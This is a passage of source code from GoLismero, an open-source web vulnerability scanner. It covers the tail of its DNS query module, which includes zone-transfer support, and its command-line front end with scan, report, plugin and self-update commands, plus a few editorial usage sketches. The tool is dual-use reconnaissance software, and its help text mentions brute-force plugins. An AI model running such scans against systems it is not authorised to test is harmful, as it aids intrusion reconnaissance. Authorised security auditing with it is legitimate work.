answer.type_coverded)
elif register_type == "SIG":
m_return = DnsRegisterSIG(answer.algorithm,
answer.expiration,
answer.interception,
answer.key_tag,
answer.labels,
answer.original_ttl,
answer.signer,
answer.type_coverded)
elif register_type == "SOA":
m_return = DnsRegisterSOA(answer.mname.to_text()[:-1],
answer.rname.to_text()[:-1],
answer.refresh,
answer.expire)
elif register_type == "SPF":
m_return = DnsRegisterSPF(answer.strings)
elif register_type == "SRV":
m_return = DnsRegisterSRV(answer.target.to_text()[:-1],
answer.priority,
answer.weight,
answer.port)
elif register_type == "TXT":
m_return = DnsRegisterTXT(answer.strings)
elif register_type == "WKS":
m_return = DnsRegisterWKS(answer.address,
answer.protocol,
answer.bitmap)
elif register_type == "X25":
m_return = DnsRegisterX25(answer.address)
else:
raise ValueError("DNS register type '%s' is incorrect." % register_type)
return m_return
#--------------------------------------------------------------------------
def _make_request(self, register_type, host, nameservers=None, auto_resolve=True):
"""
Make a request using dnslib, and return a DNS register.
        :param register_type: Type of query: A, AAAA, CNAME...
:type register_type: str
:param host: Target host for the request.
:type host: str
:param nameservers: Custom name servers.
:type nameservers: list(str)
        :param auto_resolve: configure this function to transform the dnslib register into the golismero register.
        :type auto_resolve: bool
        :return: a list with the DnsRegisters. The returned list can be empty if an error occurred.
        :rtype: list(DnsRegister)
"""
if not isinstance(register_type, basestring):
raise TypeError("Expected str, got '%s'" % type(type))
if not isinstance(host, basestring):
raise TypeError("Expected basestring, got '%s'" % type(host))
if nameservers:
if isinstance(nameservers, list):
for n in nameservers:
if not isinstance(n, basestring):
raise TypeError("Expected basestring, got '%s'" % type(n))
else:
raise TypeError("Expected list, got '%s'" % type(nameservers))
m_query_obj = None
if nameservers:
m_query_obj = dns.resolver.Resolver(configure=False)
m_query_obj.nameservers = nameservers
else:
m_query_obj = dns.resolver.Resolver(configure=True)
            # Append the free public DNS servers to avoid errors when the DNS servers
            # configured in /etc/resolv.conf fail.
m_query_obj.nameservers.extend(self.PUBLIC_NAMESERVERS)
# Set timeouts
m_query_obj.timeout = self.REQUEST_TIMEOUT
m_query_obj.lifetime = self.REQUEST_TIMEOUT
try:
answer = m_query_obj.query(host, register_type)
except Exception:
return []
if auto_resolve:
return self._dnslib2register(register_type, answer)
else:
return answer
# Instance the singleton.
DNS = _DNS()
```
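A short usage sketch for the `DNS` singleton above. The import path `golismero.api.net.dns` is assumed from the file location, `example.com` is just a placeholder target, and live network access is needed for real answers.
```python
# Editorial usage sketch of the DNS singleton defined above; not part of the
# original module.
from golismero.api.net.dns import DNS


def show_basic_records(domain):
    # A/AAAA records (an empty list is returned on resolution errors).
    for reg in DNS.get_a(domain) + DNS.get_aaaa(domain):
        print reg
    # Name servers and mail exchangers.
    for reg in DNS.get_ns(domain) + DNS.get_mx(domain):
        print reg


if __name__ == "__main__":
    show_basic_records("example.com")
    # Zone transfers rarely succeed against well-configured servers, so an
    # empty list is the expected result here.
    print DNS.zone_transfer("example.com")
```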
#### File: Dangerous/Golismero/golismero.py
```python
GoLismero 2.0 - The web knife.
Golismero project site: https://github.com/golismero
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = []
#------------------------------------------------------------------------------
# Fix the module load path.
import sys
from os import path
script = __file__
if path.islink(script):
script = path.realpath(script)
here = path.split(path.abspath(script))[0]
assert here
thirdparty_libs = path.join(here, "thirdparty_libs")
assert path.exists(thirdparty_libs)
has_here = here in sys.path
has_thirdparty_libs = thirdparty_libs in sys.path
if not (has_here and has_thirdparty_libs):
if has_here:
sys.path.remove(here)
if has_thirdparty_libs:
sys.path.remove(thirdparty_libs)
sys.path.insert(0, thirdparty_libs)
sys.path.insert(0, here)
#------------------------------------------------------------------------------
# Python version check.
# We must do it now before trying to import any more modules.
#
# Note: this is mostly because of argparse, if you install it
# separately you can try removing this check and seeing
# what happens (we haven't tested it!).
from golismero import show_banner
from sys import version_info, exit
if __name__ == "__main__":
if version_info < (2, 7) or version_info >= (3, 0):
show_banner()
print "[!] You must use Python version 2.7"
exit(1)
    # On OS X, Python versions lower than 2.7.6 fail
import platform
if (
platform.system() == "Darwin" and
(version_info < (2,7,6) or version_info >= (3,0))
):
show_banner()
print (
"[!] OS X can experiment some problems with Python versions lower than 2.7.6. It's recommended to upgrade"
" http://www.python.org/download/releases/2.7.6/"
)
#------------------------------------------------------------------------------
# Imported modules
import argparse
import os
import sys
from ConfigParser import RawConfigParser
from getpass import getpass
from glob import glob
from os import getenv, getpid
from thread import get_ident
from traceback import format_exc
# Hack to disable logging in SnakeMQ.
import snakemq
if path.sep == "\\":
snakemq.init_logging(open("nul", "w"))
else:
snakemq.init_logging(open("/dev/null", "w"))
#------------------------------------------------------------------------------
# GoLismero modules
from golismero.api.config import Config
from golismero.api.external import run_external_tool
from golismero.api.logger import Logger
from golismero.api.plugin import CATEGORIES, STAGES
from golismero.common import OrchestratorConfig, AuditConfig, get_profile, \
get_available_profiles, get_default_plugins_folder
from golismero.main import launcher
from golismero.main.console import get_terminal_size, colorize, Console
from golismero.main.testing import PluginTester
from golismero.managers.pluginmanager import PluginManager
from golismero.managers.processmanager import PluginContext
#------------------------------------------------------------------------------
# Custom argparse actions
class ArgumentParserWithBanner(argparse.ArgumentParser):
must_show_banner = True
def error(self, message):
if self.must_show_banner:
self.must_show_banner = False
show_banner()
self.usage = None
message += "\n\nUse -h to see the quick help, or --help to show the full help text."
return super(ArgumentParserWithBanner, self).error(message)
# --enable-plugin
class EnablePluginAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
parsed = [ (True, x.strip()) for x in values.split(",")]
overrides = getattr(namespace, self.dest, [])
overrides.extend(parsed)
setattr(namespace, self.dest, overrides)
# --disable-plugin
class DisablePluginAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
parsed = [ (False, x.strip()) for x in values.split(",")]
overrides = getattr(namespace, self.dest, [])
overrides.extend(parsed)
setattr(namespace, self.dest, overrides)
# --file
class LoadListFromFileAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
try:
with open(values, "rU") as f:
tokens = []
for line in f:
line = line.strip()
if not line or line[0] == "#":
continue
                    tokens.append(line)
except Exception:
parser.error("Error reading file: %s" % values)
setattr(namespace, self.dest, tokens)
# --cookie-file
class ReadValueFromFileAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
try:
with open(values, "rU") as f:
data = f.read()
except IOError, e:
parser.error("Can't read file %r. Error: %s" % (values, str(e)))
setattr(namespace, self.dest, data)
# --plugin-arg
class SetPluginArgumentAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
d = getattr(namespace, self.dest, None)
if d is None:
d = []
setattr(namespace, self.dest, d)
try:
plugin_id, token = values.split(":", 1)
plugin_id = plugin_id.strip()
key, value = token.split("=", 1)
key = key.strip()
value = value.strip()
assert plugin_id
assert key
d.append( (plugin_id, key, value) )
except Exception:
parser.error("invalid plugin argument: %s" % values)
# -h
class QuickHelpAction(argparse._HelpAction):
def __call__(self, parser, namespace, values, option_string=None):
if parser.must_show_banner:
parser.must_show_banner = False
show_banner()
parser._print_message(parser.quick_help)
parser.exit()
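# Editorial note (not in the original source): with the actions above, a
# command line such as "-e plugin_a,plugin_b -d plugin_c" (hypothetical plugin
# names) accumulates
#   plugin_load_overrides == [(True, "plugin_a"), (True, "plugin_b"),
#                             (False, "plugin_c")]
# so the enable/disable overrides can later be applied in the order given.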
#------------------------------------------------------------------------------
# Command line parser using argparse.
COMMANDS = (
# Scanning.
"SCAN",
"RESCAN",
"REPORT",
"IMPORT",
# Information.
"PROFILES",
"PLUGINS",
"INFO",
# Management.
"LOAD",
"DUMP",
"UPDATE",
)
def cmdline_parser():
# Fix the console width bug in argparse.
try:
os.environ["COLUMNS"] = str(get_terminal_size()[0])
except Exception:
pass
# Use Bash autocompletion when available.
try:
from argcomplete import autocomplete
from argcomplete.completers import ChoicesCompleter, FilesCompleter
autocomplete_enabled = True
except ImportError:
autocomplete_enabled = False
if autocomplete_enabled:
def profiles_completer(prefix, **kwargs):
return [
v for v in get_available_profiles()
if v.startswith(prefix)
]
def plugins_completer(prefix, **kwargs):
if ":" in prefix:
return [prefix,]
names = []
base = get_default_plugins_folder()
for cat in CATEGORIES:
for (_, _, filenames) in os.walk(path.join(base, cat)):
for filename in filenames:
if filename.startswith(prefix):
name, ext = path.splitext(filename)
if ext.lower() == ".golismero":
names.append(name)
return names
parser = ArgumentParserWithBanner(fromfile_prefix_chars="@", add_help=False)
cmd = parser.add_argument("command", metavar="COMMAND", help="action to perform")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(COMMANDS + tuple(x.lower() for x in COMMANDS))
parser.add_argument("targets", metavar="TARGET", nargs="*", help="zero or more arguments, meaning depends on command")
parser.add_argument("-h", action=QuickHelpAction, default=argparse.SUPPRESS, help="show this help message and exit")
parser.add_argument("--help", action='help', default=argparse.SUPPRESS, help="show this help message and exit")
gr_main = parser.add_argument_group("main options")
cmd = gr_main.add_argument("-f", "--file", metavar="FILE", action=LoadListFromFileAction, help="load a list of targets from a plain text file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=False)
cmd = gr_main.add_argument("--config", metavar="FILE", help="global configuration file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".conf",), directories=False)
cmd = gr_main.add_argument("--user-config", metavar="FILE", help="per-user configuration file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".conf",), directories=False)
cmd = gr_main.add_argument("-p", "--profile", metavar="NAME", help="profile to use")
if autocomplete_enabled:
cmd.completer = profiles_completer
cmd = gr_main.add_argument("--ui-mode", metavar="MODE", help="UI mode")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(("console", "disabled")) ##, "web"))
gr_main.add_argument("-v", "--verbose", action="count", help="increase output verbosity")
gr_main.add_argument("-q", "--quiet", action="store_const", dest="verbose", const=0, help="suppress text output")
gr_main.add_argument("--color", action="store_true", default=None, dest="color", help="use colors in console output")
gr_main.add_argument("--no-color", action="store_false", default=None, dest="color", help="suppress colors in console output")
gr_audit = parser.add_argument_group("audit options")
gr_audit.add_argument("--audit-name", metavar="NAME", help="customize the audit name")
cmd = gr_audit.add_argument("-db", "--audit-db", metavar="DATABASE", dest="audit_db", help="specify a database filename")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".db",), directories=False)
gr_audit.add_argument("-nd", "--no-db", dest="audit_db", action="store_const", const=":memory:", help="do not store the results in a database")
cmd = gr_audit.add_argument("-i", "--input", dest="imports", metavar="FILENAME", action="append", help="read results from external tools right before the audit")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".csv", ".xml", ".nessus"), directories=False)
gr_audit.add_argument("-ni", "--no-input", dest="disable_importing", action="store_true", default=False, help="do not read results from external tools")
gr_report = parser.add_argument_group("report options")
cmd = gr_report.add_argument("-o", "--output", dest="reports", metavar="FILENAME", action="append", help="write the results of the audit to this file (use - for stdout)")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".html", ".rst", ".txt"), directories=False)
gr_report.add_argument("-no", "--no-output", dest="disable_reporting", action="store_true", default=False, help="do not output the results")
gr_report.add_argument("--full", action="store_false", default=None, dest="only_vulns", help="produce fully detailed reports")
gr_report.add_argument("--brief", action="store_true", dest="only_vulns", help="report only the highlights")
gr_net = parser.add_argument_group("network options")
gr_net.add_argument("--allow-subdomains", action="store_true", default=None, dest="include_subdomains", help="include subdomains in the target scope")
gr_net.add_argument("--forbid-subdomains", action="store_false", default=None, dest="include_subdomains", help="do not include subdomains in the target scope")
gr_net.add_argument("--parent", action="store_true", default=None, dest="allow_parent", help="include parent folders in the target scope")
gr_net.add_argument("-np", "--no-parent", action="store_false", default=None, dest="allow_parent", help="do not include parent folders in the target scope")
cmd = gr_net.add_argument("-r", "--depth", help="maximum spidering depth (use \"infinite\" for no limit)")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(("1", "200", "infinite",))
gr_net.add_argument("--follow-redirects", action="store_true", default=None, dest="follow_redirects", help="follow redirects")
gr_net.add_argument("--no-follow-redirects", action="store_false", default=None, dest="follow_redirects", help="do not follow redirects")
gr_net.add_argument("--follow-first", action="store_true", default=None, dest="follow_first_redirect", help="always follow a redirection on the target URL itself")
gr_net.add_argument("--no-follow-first", action="store_false", default=None, dest="follow_first_redirect", help="don't treat a redirection on a target URL as a special case")
gr_net.add_argument("--max-connections", help="maximum number of concurrent connections per host")
gr_net.add_argument("-l", "--max-links", type=int, default=None, help="maximum number of links to analyze (0 => infinite)")
gr_net.add_argument("-pu","--proxy-user", metavar="USER", help="HTTP proxy username")
gr_net.add_argument("-pp","--proxy-pass", metavar="PASS", help="HTTP proxy password")
gr_net.add_argument("-pa","--proxy-addr", metavar="ADDRESS", help="HTTP proxy address")
gr_net.add_argument("-pn","--proxy-port", metavar="PORT", help="HTTP proxy port number")
gr_net.add_argument("--cookie", metavar="COOKIE", help="set cookie for requests")
gr_net.add_argument("--user-agent", metavar="USER_AGENT", help="set a custom user agent or 'random' value")
cmd = gr_net.add_argument("--cookie-file", metavar="FILE", action=ReadValueFromFileAction, dest="cookie", help="load a cookie from file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=False)
gr_net.add_argument("--persistent-cache", action="store_true", dest="use_cache_db", default=True, help="use a persistent network cache [default]")
gr_net.add_argument("--volatile-cache", action="store_false", dest="use_cache_db", help="use a volatile network cache")
gr_plugins = parser.add_argument_group("plugin options")
cmd = gr_plugins.add_argument("-a", "--plugin-arg", metavar="PLUGIN:KEY=VALUE", action=SetPluginArgumentAction, dest="raw_plugin_args", help="pass an argument to a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
cmd = gr_plugins.add_argument("-e", "--enable-plugin", metavar="PLUGIN", action=EnablePluginAction, default=[], dest="plugin_load_overrides", help="enable a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
cmd = gr_plugins.add_argument("-d", "--disable-plugin", metavar="PLUGIN", action=DisablePluginAction, dest="plugin_load_overrides", help="disable a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
gr_plugins.add_argument("--max-concurrent", metavar="N", type=int, default=None, help="maximum number of plugins to run concurrently")
gr_plugins.add_argument("--plugin-timeout", metavar="N", type=float, default=None, help="timeout in seconds for the execution of a plugin")
cmd = gr_plugins.add_argument("--plugins-folder", metavar="PATH", help="customize the location of the plugins" )
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=True)
if autocomplete_enabled:
autocomplete(parser)
quick_help = (
################################################################################
"\n"
" SCAN:\n"
" Perform a vulnerability scan on the given targets. Optionally import\n"
" results from other tools and write a report. The arguments that follow may\n"
" be domain names, IP addresses or web pages.\n"
"\n"
" RESCAN:\n"
" Same as SCAN, but previously run tests are repeated. If the database is\n"
" new, this command is identical to SCAN.\n"
"\n"
" PROFILES:\n"
" Show a list of available config profiles. This command takes no arguments.\n"
"\n"
" PLUGINS:\n"
" Show a list of available plugins. This command takes no arguments.\n"
"\n"
" INFO:\n"
" Show detailed information on a given plugin. The arguments that follow are\n"
" the plugin IDs. You can use glob-style wildcards.\n"
"\n"
" REPORT:\n"
" Write a report from an earlier scan. This command takes no arguments.\n"
" To specify output files use the -o switch.\n"
"\n"
" IMPORT:\n"
" Import results from other tools and optionally write a report, but don't\n"
" scan the targets. This command takes no arguments. To specify input files\n"
" use the -i switch.\n"
"\n"
" DUMP:\n"
" Dump the database from an earlier scan in SQL format. This command takes no\n"
" arguments. To specify output files use the -o switch.\n"
"\n"
" LOAD:\n"
" Load a database dump from an earlier scan in SQL format. This command takes\n"
" no arguments. To specify input files use the -i switch.\n"
"\n"
" UPDATE:\n"
" Update GoLismero to the latest version. Requires Git to be installed and\n"
" available in the PATH. This command takes no arguments.\n"
"\n"
"examples:\n"
"\n"
" scan a website and show the results on screen:\n"
" %(prog)s scan http://www.example.com\n"
"\n"
" grab Nmap results, scan all hosts found and write an HTML report:\n"
" %(prog)s scan -i nmap_output.xml -o report.html\n"
"\n"
" grab results from OpenVAS and show them on screen, but don't scan anything:\n"
" %(prog)s import -i openvas_output.xml\n"
"\n"
" show a list of all available configuration profiles:\n"
" %(prog)s profiles\n"
"\n"
" show a list of all available plugins:\n"
" %(prog)s plugins\n"
"\n"
" show information on all bruteforcer plugins:\n"
" %(prog)s info brute_*\n"
"\n"
" dump the database from a previous scan:\n"
" %(prog)s dump -db example.db -o dump.sql\n"
"\n"
################################################################################
)
parser.usage = parser.format_usage()[7:] + \
"\navailable commands:\n" + quick_help
parser.quick_help = (
"usage: %(prog)s COMMAND [TARGETS...] [--options]\n" \
+ quick_help) % {"prog": parser.prog}
return parser
#------------------------------------------------------------------------------
def parse_plugin_args(manager, plugin_args):
"""
Parse a list of tuples with plugin arguments as a dictionary of
dictionaries, with plugin IDs sanitized.
:param manager: Plugin manager.
:type manager: PluginManager
:param plugin_args: Arguments as specified in the command line.
:type plugin_args: list(tuple(str, str, str))
:returns: Sanitized plugin arguments. Dictionary mapping plugin
names to dictionaries mapping argument names and values.
:rtype: dict(str -> dict(str -> str))
:raises KeyError: Plugin or argument not found.
"""
parsed = {}
for plugin_id, key, value in plugin_args:
plugin_info = manager.guess_plugin_by_id(plugin_id)
if not plugin_info:
raise KeyError("Plugin not found: %s" % plugin_id)
key = key.lower()
if key not in plugin_info.plugin_args:
raise KeyError(
"Argument not found: %s:%s" % (plugin_id, key))
try:
target = parsed[plugin_info.plugin_id]
except KeyError:
parsed[plugin_info.plugin_id] = target = {}
target[key] = value
return parsed
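# Illustrative sketch (not part of GoLismero): shows the shape transformation
# performed by parse_plugin_args() above, using hardcoded example data instead
# of a real PluginManager. The plugin ID and argument names are hypothetical.
def _example_parse_plugin_args_shape():
    # Input: tuples collected from repeated "-a PLUGIN:KEY=VALUE" options.
    raw_plugin_args = [
        ("example_plugin", "WORDLIST", "subs_small"),
        ("example_plugin", "Tries", "3"),
    ]
    # Output: dict of dicts, with argument names lowercased.
    parsed = {}
    for plugin_id, key, value in raw_plugin_args:
        parsed.setdefault(plugin_id, {})[key.lower()] = value
    assert parsed == {"example_plugin": {"wordlist": "subs_small", "tries": "3"}}
    return parsed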
#------------------------------------------------------------------------------
def build_config_from_cmdline():
# Get the command line parser.
parser = cmdline_parser()
# Parse the command line options.
try:
args = sys.argv[1:]
envcfg = getenv("GOLISMERO_SETTINGS")
if envcfg:
args = parser.convert_arg_line_to_args(envcfg) + args
P, V = parser.parse_known_args(args)
if P.targets:
P.targets += V
else:
P.targets = V
P.plugin_args = {}
command = P.command.upper()
if command in COMMANDS:
P.command = command
if command == "RESCAN":
P.command = "SCAN"
P.redo = True
else:
P.redo = False
else:
P.targets.insert(0, P.command)
P.command = "SCAN"
# Load the Orchestrator options.
cmdParams = OrchestratorConfig()
cmdParams.command = P.command
if P.config:
cmdParams.config_file = path.abspath(P.config)
if not path.isfile(cmdParams.config_file):
raise ValueError("File not found: %s" % cmdParams.config_file)
if cmdParams.config_file:
cmdParams.from_config_file(cmdParams.config_file,
allow_profile = True)
if P.user_config:
cmdParams.user_config_file = path.abspath(P.user_config)
if not path.isfile(cmdParams.user_config_file):
raise ValueError(
"File not found: %s" % cmdParams.user_config_file)
if cmdParams.user_config_file:
cmdParams.from_config_file(cmdParams.user_config_file,
allow_profile = True)
if P.profile:
cmdParams.profile = P.profile
cmdParams.profile_file = get_profile(cmdParams.profile)
if cmdParams.profile_file:
cmdParams.from_config_file(cmdParams.profile_file)
cmdParams.from_object(P)
cmdParams.plugin_load_overrides = P.plugin_load_overrides
# Enable console colors if requested.
Console.use_colors = cmdParams.color
# Show the program banner.
parser.must_show_banner = False
if cmdParams.verbose:
show_banner()
# Load the target audit options.
auditParams = AuditConfig()
auditParams.profile = cmdParams.profile
auditParams.profile_file = cmdParams.profile_file
auditParams.config_file = cmdParams.config_file
auditParams.user_config_file = cmdParams.user_config_file
if auditParams.config_file:
auditParams.from_config_file(auditParams.config_file)
if auditParams.user_config_file:
auditParams.from_config_file(auditParams.user_config_file)
if auditParams.profile_file:
auditParams.from_config_file(auditParams.profile_file)
auditParams.from_object(P)
auditParams.plugin_load_overrides = P.plugin_load_overrides
# If importing is turned off, remove the list of imports.
# FIXME this should be done by argparse in argument order!
if P.disable_importing:
auditParams.imports = []
# If reports are turned off, remove the list of reports.
# Otherwise, if no reports are specified, default to screen report.
# FIXME this should be done by argparse in argument order!
if P.disable_reporting:
auditParams.reports = []
elif (
not auditParams.reports and
(P.command != "REPORT" or not auditParams.targets)
):
auditParams.reports = ["-"]
if auditParams.only_vulns is None:
auditParams.only_vulns = True
# Show exceptions as command line parsing errors.
except Exception, e:
##raise # XXX DEBUG
parser.error("arguments error: %s" % str(e))
# Get the plugins folder from the parameters.
# If no plugins folder is given, use the default.
plugins_folder = cmdParams.plugins_folder
if not plugins_folder:
plugins_folder = path.abspath(script)
plugins_folder = path.dirname(plugins_folder)
plugins_folder = path.join(plugins_folder, "plugins")
if not path.isdir(plugins_folder):
from golismero import common
plugins_folder = path.abspath(common.__file__)
plugins_folder = path.dirname(plugins_folder)
plugins_folder = path.join(plugins_folder, "plugins")
if not path.isdir(plugins_folder):
parser.error("Default plugins folder not found, aborting!")
cmdParams.plugins_folder = plugins_folder
# Return the parser, options, and config objects.
return parser, P, cmdParams, auditParams
#------------------------------------------------------------------------------
# Start of program.
def main():
# Command implementations.
command = {
"PLUGINS": command_plugins, # List plugins and quit.
"INFO": command_info, # Display plugin info and quit.
"PROFILES": command_profiles, # List profiles and quit.
"DUMP": command_dump, # Dump the database and quit.
"LOAD": command_load, # Load a database dump and quit.
"UPDATE": command_update, # Update GoLismero and quit.
}
# Parse the command line.
parser, P, cmdParams, auditParams = build_config_from_cmdline()
# Get the command implementation.
implementation = command.get(P.command, command_run)
# Run the command.
implementation(parser, P, cmdParams, auditParams)
#------------------------------------------------------------------------------
def command_plugins(parser, P, cmdParams, auditParams):
# Fail if we have arguments.
if P.targets:
parser.error("too many arguments")
# Load the plugins list.
try:
manager = PluginManager()
manager.find_plugins(cmdParams)
except Exception, e:
parser.error("error loading plugins list: %s" % str(e))
# Show the list of plugins.
print colorize("-------------", "red")
print colorize(" Plugin list", "red")
print colorize("-------------", "red")
# Import plugins...
import_plugins = manager.get_plugins("import")
if import_plugins:
print
print colorize("-= Import plugins =-", "yellow")
for name in sorted(import_plugins.keys()):
info = import_plugins[name]
print "\n%s:\n %s" % \
(colorize(name[7:], "cyan"), info.description)
# Testing plugins...
testing_plugins = manager.get_plugins("testing")
if testing_plugins:
names = sorted(testing_plugins.keys())
names = [x[8:] for x in names]
stages = [ (v,k) for (k,v) in STAGES.iteritems() ]
stages.sort()
for _, stage in stages:
s = stage + "/"
p = len(s)
s_slice = [x[p:] for x in names if x.startswith(s)]
if s_slice:
print
print colorize("-= %s plugins =-" % stage.title(), "yellow")
for name in s_slice:
info = testing_plugins["testing/%s/%s" % (stage, name)]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name, "cyan"), desc)
# Report plugins...
report_plugins = manager.get_plugins("report")
if report_plugins:
print
print colorize("-= Report plugins =-", "yellow")
for name in sorted(report_plugins.keys()):
info = report_plugins[name]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name[7:], "cyan"), desc)
# UI plugins...
ui_plugins = manager.get_plugins("ui")
if ui_plugins:
print
print colorize("-= UI plugins =-", "yellow")
for name in sorted(ui_plugins.keys()):
info = ui_plugins[name]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name[3:], "cyan"), desc)
if path.sep == "/":
print
exit(0)
#------------------------------------------------------------------------------
def command_info(parser, P, cmdParams, auditParams):
# Fail if we don't have arguments.
if not P.targets:
parser.error("too few arguments")
# Load the plugins list.
try:
manager = PluginManager()
manager.find_plugins(cmdParams)
except Exception, e:
parser.error("error loading plugins list: %s" % str(e))
# Show the plugin information.
try:
to_print = []
plugin_infos = []
for plugin_id in P.targets:
m_found = manager.search_plugins_by_mask(plugin_id)
plugin_infos.extend( m_found.values() )
if not plugin_infos:
raise KeyError()
for info in plugin_infos:
Config._context = PluginContext(
address = None,
msg_queue = None,
orchestrator_pid = getpid(),
orchestrator_tid = get_ident(),
plugin_info = info
)
try:
manager.load_plugin_by_id(info.plugin_id)
except Exception:
pass
m_root = cmdParams.plugins_folder
m_root = path.abspath(m_root)
if not m_root.endswith(path.sep):
m_root += path.sep
m_location = info.descriptor_file[len(m_root):]
a, b = path.split(m_location)
b = colorize(b, "cyan")
m_location = path.join(a, b)
m_src = info.plugin_module[len(m_root):]
a, b = path.split(m_src)
b = colorize(b, "cyan")
m_src = path.join(a, b)
m_name = info.plugin_id
p = m_name.rfind("/") + 1
m_name = m_name[:p] + colorize(m_name[p:], "cyan")
m_desc = info.description.strip()
m_desc = m_desc.replace("\n", "\n ")
to_print.append("")
to_print.append("Information for plugin: %s" %
colorize(info.display_name, "yellow"))
to_print.append("-" * len("Information for plugin: %s" %
info.display_name))
to_print.append("%s %s" %
(colorize("ID:", "green"), m_name))
to_print.append("%s %s" %
(colorize("Location:", "green"), m_location))
to_print.append("%s %s" %
(colorize("Source code:", "green"), m_src))
if info.plugin_class:
to_print.append("%s %s" %
(colorize("Class name:", "green"),
colorize(info.plugin_class, "cyan")))
to_print.append("%s %s" %
(colorize("Category:", "green"), info.category))
to_print.append("%s %s" %
(colorize("Stage:", "green"), info.stage))
if info.description != info.display_name:
to_print.append("")
to_print.append("%s\n %s" %
(colorize("Description:", "green"), m_desc))
if info.plugin_args:
to_print.append("")
to_print.append(colorize("Arguments:", "green"))
for name, default in sorted(info.plugin_args.iteritems()):
if name in info.plugin_passwd_args:
default = "****************"
to_print.append("\t%s -> %s" %
(colorize(name, "cyan"), default))
to_print.append("")
except KeyError:
##raise # XXX DEBUG
parser.error("plugin ID not found")
except ValueError:
##raise # XXX DEBUG
parser.error("plugin ID not found")
except Exception, e:
##raise # XXX DEBUG
parser.error("error recovering plugin info: %s" % str(e))
for line in to_print:
print line
exit(0)
#------------------------------------------------------------------------------
def command_profiles(parser, P, cmdParams, auditParams):
if P.targets:
parser.error("too many arguments")
profiles = sorted(get_available_profiles())
if not profiles:
print "No available profiles!"
else:
print "--------------------"
print " " + colorize("Available profiles", "yellow")
print "--------------------"
print
for name in profiles:
try:
p = RawConfigParser()
p.read(get_profile(name))
desc = p.get("golismero", "description")
except Exception:
desc = None
if desc:
print "+ %s: %s" % (colorize(name, "cyan"), desc)
else:
print "+ %s" % colorize(name, "cyan")
if path.sep == "/":
print
exit(0)
#------------------------------------------------------------------------------
def command_dump(parser, P, cmdParams, auditParams):
if auditParams.is_new_audit():
parser.error("missing audit database")
if not P.reports:
parser.error("missing output filename")
if P.verbose != 0:
print "Loading database: %s" % \
colorize(auditParams.audit_db, "yellow")
import sqlite3
for filename in P.reports:
if P.verbose != 0:
print "Dumping to file: %s" % colorize(filename, "cyan")
db = sqlite3.connect(auditParams.audit_db)
try:
with open(filename, 'w') as f:
for line in db.iterdump():
f.write(line + "\n")
finally:
db.close()
exit(0)
#------------------------------------------------------------------------------
def command_load(parser, P, cmdParams, auditParams):
if not auditParams.is_new_audit():
parser.error("audit database already exists")
if not P.imports:
parser.error("missing input filename")
if len(P.imports) > 1:
parser.error("only one input filename allowed")
import sqlite3
filename = P.imports[0]
if P.verbose != 0:
print "Loading from file: %s" % colorize(filename, "cyan")
with open(filename, 'rU') as f:
data = f.read()
if P.verbose != 0:
print "Creating database: %s" % \
colorize(auditParams.audit_db, "yellow")
db = sqlite3.connect(auditParams.audit_db)
try:
try:
cursor = db.cursor()
try:
cursor.executescript(data)
del data
db.commit()
finally:
cursor.close()
finally:
db.close()
except:
parser.error("error loading database dump: " + str(sys.exc_value))
exit(0)
#------------------------------------------------------------------------------
def command_update(parser, P, cmdParams, auditParams):
# Fail if we got any arguments.
if P.targets:
parser.error("too many arguments")
# Setup a dummy environment so we can call the API.
with PluginTester(autoinit=False) as t:
t.orchestrator_config.ui_mode = "console"
t.orchestrator_config.verbose = cmdParams.verbose
t.orchestrator_config.color = cmdParams.color
t.init_environment(mock_audit=False)
# Flag to tell if we fetched new code.
did_update = False
# Run Git here to download the latest version.
if cmdParams.verbose:
Logger.log("Updating GoLismero...")
if os.path.exists(os.path.join(here, ".git")):
helper = _GitHelper(cmdParams.verbose)
run_external_tool("git", ["pull"], cwd = here, callback = helper)
did_update = helper.did_update
elif cmdParams.verbose:
Logger.log_error(
"Cannot update GoLismero if installed from a zip file! You"
" must install it from the Git repository to get updates.")
# Update the TLD names.
if cmdParams.verbose:
Logger.log("Updating list of TLD names...")
import tldextract
tldextract.TLDExtract().update(True)
# If no code was updated, just quit here.
if not did_update:
if cmdParams.verbose:
Logger.log("Update complete.")
exit(0)
# Tell the user we're about to restart.
if cmdParams.verbose:
Logger.log("Reloading GoLismero...")
# Unload GoLismero.
import golismero.patches.mp
golismero.patches.mp.undo()
x = here
if not x.endswith(os.path.sep):
x += os.path.sep
our_modules = {
n: m for n, m in sys.modules.iteritems()
if n.startswith("golismero.") or (
hasattr(m, "__file__") and m.__file__.startswith(x)
)
}
for n in our_modules.iterkeys():
if n.startswith("golismero.") or n.startswith("plugin_"):
del sys.modules[n]
# Restart GoLismero.
